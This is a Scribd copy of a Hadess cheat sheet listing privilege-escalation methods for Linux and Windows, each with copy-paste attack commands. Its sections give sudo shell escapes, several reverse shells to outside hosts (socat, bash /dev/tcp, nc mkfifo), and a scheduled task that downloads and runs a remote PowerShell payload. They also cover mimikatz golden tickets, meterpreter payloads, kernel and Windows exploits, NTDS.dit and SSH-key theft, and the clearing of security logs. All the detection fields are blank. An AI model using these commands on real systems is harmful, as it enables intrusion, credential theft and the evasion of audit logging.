Scribd
Upload
505 views186 pages

40 Methods For Privilege Escalation Linux-Windows-macOS

Uploaded by

vinayakrocks2711
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
505 views186 pages

40 Methods For Privilege Escalation Linux-Windows-macOS

Uploaded by

vinayakrocks2711
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 186

WWW.HADESS.

IO

40 METHODS FOR PRIVILEGE


ESCALATION
PART 1

HADESS | SECURE AGILE DEVELOPMENT


ABUSING SUDO BINARIES

Domain: No sudo vim -c ':!/bin/bash'


sudo find / etc/passwd -exec /bin/bash \;
Local Admin: Yes echo "os.execute('/bin/bash/')" > /tmp/shell.nse && sudo nmap --
script=/tmp/shell.nse
OS: Linux sudo env /bin/bash
sudo awk 'BEGIN {system("/bin/bash")}'
Type: Abusing Privileged Files sudo perl -e 'exec "/bin/bash";'
sudo python -c 'import pty;pty.spawn("/bin/bash")'
Difficulty sudo less /etc/hosts - !bash
sudo man man - !bash
APT Used

sudo ftp - ! /bin/bash


Attacker = socat file:`tty`,raw,echo=0 tcp-listen:1234
Victim = sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane
tcp:192.168.1.105:1234
echo test > notes.txt
sudo zip test.zip notes.txt -T --unzip-command="sh -c /bin/bash"
Detection
sudo gcc -wrapper /bin/bash,-s .
HADESS | SECURE AGILE DEVELOPMENT
ABUSING SCHEDULED TASKS

Domain: Y/N echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh


chmod +x /home/user/systemupdate.sh
Local Admin: Yes Wait a while
/bin/bash -p
OS: Linux id && whoami

Type: Abusing Scheduled Tasks

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


GOLDEN TICKET WITH SCHEDULED TASKS

Domain: Yes 1.mimikatz# token::elevate


2.mimikatz# vault::cred /patch
Local Admin: Yes 3.mimikatz# lsadump::lsa /patch
4.mimikatz# kerberos::golden /user:Administrator /rc4:<Administrator
OS: Windows NTLM(step 3)> /domain:<DOMAIN> /sid:<USER SID> /sids:<Administrator
SIDS> /ticket:<OUTPUT TICKET PATH>
Type: Abusing Scheduled Tasks 5.powercat -l -v -p 443
6.schtasks /create /S DOMAIN /SC Weekly /RU "NT Authority\SYSTEM"
Difficulty /TN "enterprise" /TR "powershell.exe-c 'iex (iwr
http://10.10.10.10/reverse.ps1)'”
APT Used

7.schtasks /run /s DOMAIN /TN "enterprise”

Detection

HADESS | SECURE AGILE DEVELOPMENT


ABUSING INTERPRETER CAPABILITIES

Domain: No 1. getcap -r / 2>/dev/null


a. /usr/bin/python2.6 = cap_setuid+ep
Local Admin: Yes b. /usr/bin/python2.6 -c 'import os; os.setuid(0);
os.system("/bin/bash")'
OS: Linux c. id && whoami
2. getcap -r / 2>/dev/null
Type: Abusing Capabilities a. /usr/bin/perl = cap_setuid+ep
b. /usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec
Difficulty "/bin/bash";'
c. id && whoami
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ABUSING BINARY CAPABILITIES

Domain: No 1. getcap -r / 2>/dev/null


2. /usr/bin/tar = cap dac read search+ep
Local Admin: Yes 3. /usr/bin/tar -cvf key.tar /root/.ssh/id_rsa
4. /usr/bin/tar -xvf key.tar
OS: Linux 5. openssl req -engine /tmp/priv.so
6. /bin/bash -p
Type: Abusing Capabilities 7. id && whoami

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ABUSING ACTIVESESSIONS CAPABILITIES

Domain: No 1. https://raw.githubusercontent.com/EmpireProject/Empire/master/data
/module_source/lateral_movement/Invoke-SQLOSCmd.ps1
Local Admin: Yes 2. . .\Heidi.ps1
3. Invoke-SQLOCmd -Verbose -Command “net localgroup administrators
OS: Windows user1 /add” -Instance COMPUTERNAME

Type: Abusing Capabilities

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ESCALATE WITH TRUSTWORTHY IN SQL SERVER

Domain: Yes 1. 1. . .\PowerUpSQL.ps1


2. 2. Get-SQLInstanceLocal -Verbose

Local Admin: Yes 3. 3. (Get-SQLServerLinkCrawl -Verbos -Instance "10.10.10.10" -Query 'select * from
master..sysservers').customer.query
4. 4.
OS: Windows
5. USE "master";
6. SELECT *, SCHEMA_NAME("schema_id") AS 'schema' FROM
Type: Abusing Capabilities "master"."sys"."objects" WHERE "type" IN ('P', 'U', 'V', 'TR', 'FN', 'TF, 'IF');
7. execute('sp_configure "xp_cmdshell",1;RECONFIGURE') at "<DOMAIN>\<DATABASE
NAME>"
Difficulty
8. 5. powershell -ep bypass
9. 6. Import-Module .\powercat.ps1
APT Used

10. 7. powercat -l -v -p 443 -t 10000


11. 8.
12. SELECT *, SCHEMA_NAME("schema_id") AS 'schema' FROM
"master"."sys"."objects" WHERE "type" IN ('P', 'U', 'V', 'TR', 'FN', 'TF, 'IF');
13. execute('sp_configure "xp_cmdshell",1;RECONFIGURE') at "<DOMAIN>\<DATABASE
NAME>"
Detection 14. execute('exec master..xp_cmdshell "\\10.10.10.10\reverse.exe"') at "<DOMAIN>\
<DATABASE NAME>"
HADESS | SECURE AGILE DEVELOPMENT
ABUSING MYSQL RUN AS ROOT

Domain: Yes 1. ps aux | grep root


2. mysql -u root -p
Local Admin: Yes 3. \! chmod +s /bin/bash
4. Exit
OS: Windows 5. /bin/bash -p
6. id && whoami
Type: Abusing Services

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ABUSING JOURNALCTL

Domain: No 1. Journalctl
2. !/bin/sh
Local Admin: Yes

OS: Linux

Type: Abusing Services

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ABUSING VDS

Domain: No 1. . .\PowerUp.ps1
2. Invoke-ServiceAbuse -Name ‘vds’ -UserName ‘domain\user1’
Local Admin: Yes

OS: Windows

Type: Abusing Services

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ABUSING BROWSER

Domain: No 1. . .\PowerUp.ps1
2. Invoke-ServiceAbuse -Name ‘browser’ -UserName ‘domain\user1’
Local Admin: Yes

OS: Windows

Type: Abusing Services

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ABUSING LDAP

1. 0. exec ldapmodify -x -w PASSWORD

Domain: Yes 2. 1. paste this


3. dn: cn=openssh-lpk,cn=schema,cn=config
4. objectClass: olcSchemaConfig

Local Admin: Yes 5. cn: openssh-lpk


6. olcAttributeTypes: ( 1.3.6.1.4.1.24552.500.1.1.1.13 NAME 'sshPublicKey'
7. DESC 'MANDATORY: OpenSSH Public key'

OS: Linux 8. EQUALITY octetStringMatch


9. SYNTAX 1.3.6.1.4.1.1466.115.121.1.40 )
10. olcObjectClasses: ( 1.3.6.1.4.1.24552.500.1.1.2.0 NAME 'ldapPublicKey' SUP top AUXILIARY
11. DESC 'MANDATORY: OpenSSH LPK objectclass'
Type: Abusing Services 12. MAY ( sshPublicKey $ uid )
13. )
14.

Difficulty 15. 2. exec ldapmodify -x -w PASSWORD


16. 3. paste this
17. dn: uid=UID,ou=users,ou=linux,ou=servers,dc=DC,dc=DC
APT Used

18. changeType: modify


19. add: objectClass
20. objectClass: ldapPublicKey
21. -
22. add: sshPublicKey
23. sshPublicKey: content of id_rsa.pub
24. -
25. replace: EVIL GROUP ID
26. uidNumber: CURRENT USER ID
Detection 27. -
28. replace: EVIL USER ID

HADESS | SECURE AGILE DEVELOPMENT 29. gidNumber: CURRENT GROUP ID


LLMNR POISONING

Domain: Yes 1. 1.responder -I eth1 -v


2. 2.create Book.url
Local Admin: Y/N 3. [InternetShortcut]
4. URL=https://facebook.com
OS: Windows 5. IconIndex=0
6. IconFile=\\attacker_ip\not_found.ico
Type: Abusing Services

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ABUSING CERTIFICATE SERVICES

Domain: Yes 1. adcspwn.exe --adcs <cs server> --port [local port] --remote
[computer]
Local Admin: Y/N 2. adcspwn.exe --adcs cs.pwnlab.local
3. adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port
OS: Windows 9001
4. adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --
Type: Abusing Services output C:\Temp\cert_b64.txt
5. adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --
Difficulty username pwnlab.local\mranderson --password The0nly0ne! --dc
dc.pwnlab.local
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


MYSQL UDF CODE INJECTION

Domain: Yes 1. mysql -u root -p


2. mysql> use mysql;
Local Admin: Yes 3. mysql> create table admin(line blob);
4. mysql> insert into admin values(load_file('/tmp/lib_mysqludf_sys.so'));
OS: Linux 5. mysql> select * from admin into dumpfile
'/usr/lib/lib_mysqludf_sys.so';
Type: Injection 6. mysql> create function sys_exec returns integer soname
'lib_mysqludf_sys.so';
Difficulty 7. mysql> select sys_exec('bash -i >& /dev/tcp/10.10.10.10/9999 0>&1');
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



IMPERSONATION TOKEN WITH IMPERSONATELOGGEDONUSER

Domain: No 1. 1.SharpImpersonation.exe user:<user> shellcode:<URL>


2. 2.SharpImpersonation.exe user:<user>
Local Admin: Yes technique:ImpersonateLoggedOnuser

OS: Windows

Type: Injection

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



IMPERSONATION TOKEN WITH SEIMPERSONTEPRIVILEGE

Domain: No 1. 1.execute-assembly sweetpotato.exe -p beacon.exe

Local Admin: Yes

OS: Windows

Type: Injection

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT



IMPERSONATION TOKEN WITH SELOADDRIVERPRIVILEGE

Domain: No 1.EOPLOADDRIVER.exe System\\CurrentControlSet\\MyService


C:\\Users\\Username\\Desktop\\Driver.sys
Local Admin: Yes

OS: Windows

Type: Injection

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


OPENVPN CREDENTIALS

Domain: No 1. locate *.ovpn

Local Admin: Yes

OS: Windows/Linux

Type: Enumeration & Hunt

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


BASH HISTORY

Domain: No 1. history
2. cat /home/<user>/.bash_history
Local Admin: Yes 3. cat ~/.bash_history | grep -i passw

OS: Windows/Linux

Type: Enumeration & Hunt

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PACKAGE CAPTURE

Domain: No 1. tcpdump -nt -r capture.pcap -A 2>/dev/null | grep -P 'pwd='

Local Admin: Yes

OS: Windows/Linux

Type: Sniff

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


NFS ROOT SQUASHING

Domain: Yes 1. showmount -e <victim_ip>


2. mkdir /tmp/mount
Local Admin: Yes 3. mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount
4. cd /tmp/mount
OS: Linux 5. cp /bin/bash .
6. chmod +s bash
Type: Remote Procedure Calls (RPC)

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ABUSING ACCESS CONTROL LIST

Domain: Yes 1. $user = "megacorp\jorden"


2. $folder = "C:\Users\administrator"
Local Admin: Yes 3. $acl = get-acl $folder
4. $aclpermissions = $user, "FullControl", "ContainerInherit,
OS: Windows ObjectInherit", "None", "Allow"
5. $aclrule = new-object
Type: Abuse Privilege System.Security.AccessControl.FileSystemAccessRule
$aclpermissions
Difficulty 6. $acl.AddAccessRule($aclrule)
7. set-acl -path $folder -AclObject $acl
APT Used

8. get-acl $folder | folder

Detection

HADESS | SECURE AGILE DEVELOPMENT


ESCALATE WITH SEBACKUPPRIVILEGE

Domain: Yes 1. import-module .\SeBackupPrivilegeUtils.dll


2. import-module .\SeBackupPrivilegeCmdLets.dll
Local Admin: Yes 3. Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit
C:\temp\ndts.dit
OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ESCALATE WITH SEIMPERSONATEPRIVILEGE

Domain: Yes 1. https://github.com/dievus/printspoofer


2. printspoofer.exe -i -c "powershell -c whoami"
Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ESCALATE WITH SELOADDRIVERPRIVILEGE

Domain: Yes FIRST:


Download https://github.com/FuzzySecurity/Capcom-

Local Admin: Yes Rootkit/blob/master/Driver/Capcom.sys


Download
https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddri
OS: Windows
ver.cpp
Download https://github.com/tandasat/ExploitCapcom
Type: Abuse Privilege change ExploitCapcom.cpp line 292
TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
to
Difficulty
TCHAR CommandLine[] = TEXT("C:\\test\\shell.exe");
then compile ExploitCapcom.cpp and eoploaddriver.cpp to .exe
APT Used

SECOND:
1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f
exe > shell.exe
2. .\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
3. .\ExploitCapcom.exe
Detection 4. in msf exec `run`

HADESS | SECURE AGILE DEVELOPMENT


ESCALATE WITH FORCECHANGEPASSWORD

Domain: Yes https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1


Import-Module .\PowerView_dev.ps1

Local Admin: Yes Set-DomainUserPassword -Identity user1 -verbose


Enter-PSSession -ComputerName COMPUTERNAME -Credential “”

OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ESCALATE WITH GENERICWRITE

Domain: Yes $pass = ConvertTo-SecureString 'Password123#' -AsPlainText -Force


$creds = New-Object

Local Admin: Yes System.Management.Automation.PSCredential('DOMAIN\MASTER USER'), $pass)


Set-DomainObject -Credential $creds USER1 -Clear serviceprincipalname
Set-DomainObject -Credential $creds -Identity USER1 -SET
OS: Windows
@{serviceprincipalname='none/fluu'}
.\Rubeus.exe kerberoast /domain:<DOMAIN>
Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ABUSING GPO

Domain: Yes 1..\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" --Author DOMAIN\


<USER> --Command "cmd.exe" --Arguments "/c net user Administrator

Local Admin: Yes Password!@# /domain" --GPOName "ADDITIONAL DC CONFIGURATION"

OS: Windows

Type: Abuse Privilege

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PASS-THE-TICKET

Domain: Yes 1..\Rubeus.exe asktgt /user:<USET>$ /rc4:<NTLM HASH> /ptt


2.klist

Local Admin: Y/N

OS: Windows

Type: Abuse Ticket

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


GOLDEN TICKET

Domain: Yes 1.mimikatz # lsadump::dcsync /user:<USER>


2.mimikatz # kerberos::golden /user:<USER> /domain:</DOMAIN> /sid:<OBJECT

Local Admin: Y/N SECURITY ID> /rce:<NTLM HASH> /id:<USER ID>

OS: Windows

Type: Abuse Ticket

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ABUSING SPLUNK UNIVERSAL FORWARDER

Domain: Yes python PySplunkWhisperer2_remote.py --lhost 10.10.10.5 --host 10.10.15.20 --


username admin --password admin --payload '/bin/bash -c "rm /tmp/luci11;mkfifo

Local Admin: Y/N /tmp/luci11;cat /tmp/luci11|/bin/sh -i 2>&1|nc 10.10.10.5 5555 >/tmp/luci11"'

OS: Linux/Windows

Type: Abuse Channel

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ABUSING GDBUS

Domain: No gdbus call --system --dest com.ubuntu.USBCreator --object-path


/com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image

Local Admin: Yes /home/nadav/authorized_keys /root/.ssh/authorized_keys true

OS: Linux

Type: Abuse Channel

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ABUSING TRUSTED DC

Domain: Yes 1. Find user in First DC


2. If port 6666 enabled

Local Admin: Y/N 3. proxychains evil-winrm -u user -p 'pass' -i 10.100.9.253 -P 6666


4. . \mimikatz. exe "privilege:: debug" "sekurlsa:: logonpasswords" "token:: elevate"
*lsadump:: secrets* *exit"
OS: Windows
5. proxychains evil-winrm -u Administrator -p 'pass dumped in step 4' -i
10.100.10.100 -P 6666
Type: Abuse Channel

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


NTLM RELAY

Domain: Yes 1. responder -I eth1 -v


2. ntlmrelayx.py …

Local Admin: Y/N

OS: Windows

Type: NTLM

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


EXCHANGE RELAY

Domain: Yes 1. responder -I eth1 -v


2. ./exchangeRelayx.py …

Local Admin: Y/N

OS: Windows

Type: NTLM

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


DUMPING WITH DISKSHADOW

Domain: Yes 1. priv.txt contain


SET CONTEXT PERSISTENT NOWRITERSp

Local Admin: Y/N add volume c: alias 0xprashantp


createp
expose %0xprashant% z:p
OS: Windows
2. exec with diskshadow /s priv.txt

Type: Dumping

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


DUMPING WITH VSSADMIN

Domain: Yes vssadmin create shadow /for=C:


copy \\?

Local Admin: Y/N \GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit


C:\ShadowCopy
copy \\?
OS: Windows
\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYS
TEM C:\ShadowCopy./kerbrute_linux_amd64 passwordspray -d domain.local --dc
Type: Dumping 10.10.10.10 domain_users.txt Password123

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PASSWORD SPRAYING

Domain: Yes ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10


domain_users.txt Password123

Local Admin: Y/N

OS: Windows

Type: Spraying

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


AS-REP ROASTING

Domain: Yes .\Rubeus.exe asreproast

Local Admin: Y/N

OS: Windows

Type: Kerberos

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


KERBEROASTING

Domain: Yes GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100


-request

Local Admin: Y/N crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --
kerberoast output.txt

OS: Windows

Type: Kerberos

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


About Hadess
Savior of your Business to combat cyber threats Contact Us
Hadess performs offensive cybersecurity services
through infrastructures and software that To request additional information about Hadess’s services, please fill out the form
below. A Hadess representative will contact you shortly.
include vulnerability analysis, scenario attack
planning, and implementation of custom
integrated preventive projects. We organized Website:
our activities around the prevention of corporate,
www.hadess.io
industrial, and laboratory cyber threats.
Email:
[email protected]
Phone No.
+989362181112
Company No.

+982128427515
+982177873383

hadess_security

HADESS | SECURE AGILE DEVELOPMENT


Hadess
Products and Services

SAST | Audit Your Products Penetration Testing | PROTECTION PRO

Identifying and helping to address hidden weaknesses in Fully assess your organization’s threat detection and response
your Applications. capabilities with a simulated cyber-attack.

RASP | Protect Applications and APIs Anywhere Red Teaming Operation | PROTECTION PRO
Fully assess your organization’s threat detection and response
Identifying and helping to address hidden weaknesses in
capabilities with a simulated cyber-attack.
your organization’s security.

HADESS | SECURE AGILE DEVELOPMENT


HADESS
Secure Agile Development
WWW.HADESS.IO

74 METHODS FOR PRIVILEGE


ESCALATION
PART 2

HADESS | SECURE AGILE DEVELOPMENT


PART 1 SUMMARY

No Method DOMAIN APT No Method DOMAIN APT No Method DOMAIN APT

1 Abusing Sudo Binaries NO 9 Abusing N 17 Impersonation Token with


SeImpersontePrivilege
YES
journalctl

2 Abusing Scheduled Tasks


Y/N 10 Abusing VDS N 18
Impersonation Token with
YES
SeLoadDriverPrivilege

3 Golden Ticket
Scheduled Tasks
With
Yes 11 Abusing Browser N 19 OpenVPN NO
Credentials

4 Abusing Interpreter
NO 12 Abusing LDAP YES 20 Bash History NO
Capabilities

5 Abusing Binary Capabilities


NO 13 LLMNR Poisoning YES 21 Package Capture Y/N

6 Abusing ActiveSessions
NO 14 Abusing Certificate
YES 22 NFS Root Squashing
NO
Capabilities Services

7 15
Escalate with TRUSTWORTHY MySQL UDF Code
in SQL Server Y/N Y/N 23 Abusing Access
Y/N
Injection Control List

8 Abusing Mysql Y/N 16 Impersonation Token


ImpersonateLoggedOnuser
with
YES 24 Escalate With
YES
run as root SeBackupPrivilege

HADESS | SECURE AGILE DEVELOPMENT


PART 1 SUMMARY

No Method DOMAIN APT No Method DOMAIN APT

25 Escalate With
SeImpersonatePrivilege
YES 33 Abusing Gdbus Y/N

26 Escalate With
SeLoadDriverPrivilege
YES 34 Abusing Trusted DC YES

27 Escalate With
ForceChangePassword
YES 35 NTLM Relay YES

28 Escalate With YES 36 Exchange Relay YES


GenericWrite

29 Abusing GPO YES 37 Dumping with YES


diskshadow

30 Pass-the-Ticket YES 38 Dumping with


YES
vssadmin

31 Golden Ticket YES 39 Password Spraying


Y/N

32 Abusing Splunk
NO 40 AS-REP Roasting YES
Universal Forwarder

HADESS | SECURE AGILE DEVELOPMENT


PART 2
DIRTYC0W

Domain: No gcc -pthread c0w.c -o c0w; ./c0w; passwd; id

Local Admin: Yes

OS: Linux

Type: 0/1 Exploit

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


CVE-2016-1531

Domain: No CVE-2016-1531.sh;id

Local Admin: Yes

OS: Linux

Type: 0/1 Exploit

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


POLKIT

Domain: No https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-
Esclation
Local Admin: Yes poc.sh

OS: Linux

Type: 0/1 Exploit

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


DIRTYPIPE

Domain: No ./traitor-amd64 --exploit kernel:CVE-2022-0847


Whoami;id
Local Admin: Yes

OS: Linux

Type: 0/1 Exploit

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PWNKIT

Domain: No ./cve-2021-4034
Whoami;id
Local Admin: Yes

OS: Linux

Type: 0/1 Exploit

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


MS14_058

Domain: No msf > use exploit/windows/local/ms14_058_track_popup_menu


msf exploit(ms14_058_track_popup_menu) > set TARGET < target-id
Local Admin: Yes >
msf exploit(ms14_058_track_popup_menu) > exploit
OS: Windows

Type: 0/1 Exploit

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


HOT POTATO

Domain: No In command prompt type: powershell.exe -nop -ep bypass


In Power Shell prompt type: Import-Module
Local Admin: Yes C:\Users\User\Desktop\Tools\Tater\Tater.ps1
In Power Shell prompt type: Invoke-Tater -Trigger 1 -Command "net
OS: Windows localgroup
administrators user /add"
Type: 0/1 Exploit To confirm that the attack was successful, in Power Shell prompt
type:
Difficulty net localgroup administrators
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


INTEL SYSRET

Domain: No execute -H -f sysret.exe -a "-pid [pid]”

Local Admin: Yes

OS: Windows

Type: 0/1 Exploit

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PRINTNIGHTMARE

Domain: Yes https://github.com/outflanknl/PrintNightmare


PrintNightmare 10.10.10.10 exp.dll
Local Admin: Yes

OS: Windows

Type: 0/1 Exploit

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


FOLINA

Domain: Y/N https://github.com/JohnHammond/msdt-follina


python3 follina.py -c "notepad"
Local Admin: Yes

OS: Windows

Type: 0/1 Exploit

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


ALPC

Domain: Y/N https://github.com/riparino/Task_Scheduler_ALPC

Local Admin: Yes

OS: Windows

Type: 0/1 Exploit

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


REMOTEPOTATO0

Domain: Y/N sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user


normal_user
Local Admin: Yes .\RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1

OS: Windows

Type: 0/1 Exploit

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


CVE-2022-26923

Domain: Y/N certipy req 'lab.local/cve$:CVEPassword1234*@10.100.10.13' -template


Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA
Local Admin: Yes Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx
/password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN"
OS: Windows /dc:"DOMAIN_CONTROLLER" /show

Type: 0/1 Exploit

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


MS14-068

Domain: Y/N python ms14-068.py -u [email protected] -s S-1-5-21-557603841-


771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
Local Admin: Yes

OS: Windows

Type: 0/1 Exploit

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PASSWORD MINING IN MEMORY(LINUX)

Domain: No ps -ef | grep ftp;


gdp -p ftp_id
Local Admin: Yes info proc mappings
q
OS: Linux dump memory /tmp/mem [start] [end]
q
Type: Enumeration & Hunt strings /tmp/mem | grep passw

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PASSWORD MINING IN MEMORY(WINDOWS)

Domain: No 1
In Metasploit (msf > prompt) type: use
Local Admin: Yes auxiliary/server/capture/http_basic
In Metasploit (msf > prompt) type: set uripath x
OS: Windows In Metasploit (msf > prompt) type: run
2.
Type: Enumeration & Hunt In taskmgr and right-click on the “iexplore.exe” in the “Image Name”
column
Difficulty and select “Create Dump File” from the popup menu.
3.
APT Used

strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"


Select the Copy the Base64 encoded string.
In command prompt type: echo -ne [Base64 String] | base64 -d

Detection

HADESS | SECURE AGILE DEVELOPMENT


PASSWORD MINING IN REGISTRY

1.
Domain: No Open command and type:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v
DefaultUsername
Local Admin: Yes 2.
In command prompt type:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v
OS: Windows DefaultPassword
3.
Notice the credentials, from the output.
4.
Type: Enumeration & Hunt In command prompt type:
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42
-v ProxyUsername
5.
Difficulty
In command prompt type:
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42
APT Used
-v ProxyPassword
6. Notice the credentials, from the output.
7.
In command prompt type:
reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v Password
8.
In command prompt type:
reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v PasswordViewOnly
9.
Make note of the encrypted passwords and type:

Detection C:\Users\User\Desktop\Tools\vncpwd\vncpwd.exe [Encrypted Password]


10.
From the output, make note of the credentials.
HADESS | SECURE AGILE DEVELOPMENT

PASSWORD MINING IN GENERAL EVENTS VIA SEAUDIT

Domain: No ./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics


flog -s 10s -n 200
Local Admin: Yes Or
invoke-module LogCleaner.ps1
OS: Windows

Type: Enumeration & Hunt

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PASSWORD MINING IN SECURITY EVENTS VIA SESECURITY

Domain: No ./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics


flog -s 10s -n 200
Local Admin: Yes Or
wevtutil cl Security
OS: Windows

Type: Enumeration & Hunt

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


STARTUP APPLICATIONS

Domain: No 1.
In Metasploit (msf > prompt) type: use multi/handler
Local Admin: Yes In Metasploit (msf > prompt) type: set payload
windows/meterpreter/reverse_tcp
OS: Windows In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
In Metasploit (msf > prompt) type: run
Type: Enumeration & Hunt Open another command prompt and type:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP
Difficulty Address] -f exe -o
x.exe
APT Used

2.
Place x.exe in “C:\ProgramData\Microsoft\Windows\Start
Menu\Programs\Startup”.

Detection

HADESS | SECURE AGILE DEVELOPMENT


PASSWORD MINING IN MCAFEESITELISTFILES

Domain: No SharpUp.exe McAfeeSitelistFiles

Local Admin: Yes

OS: Windows

Type: Enumeration & Hunt

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PASSWORD MINING IN CACHEDGPPPASSWORD

Domain: No SharpUp.exe CachedGPPPassword

Local Admin: Yes

OS: Windows

Type: Enumeration & Hunt

Difficulty
APT Used

Detection

HADESS | SECURE AGILE DEVELOPMENT


PASSWORD MINING IN DOMAINGPPPASSWORD

Domain: No SharpUp.exe DomainGPPPassword

Local Admin: Yes

OS: Windows

Type: Enumeration & Hunt
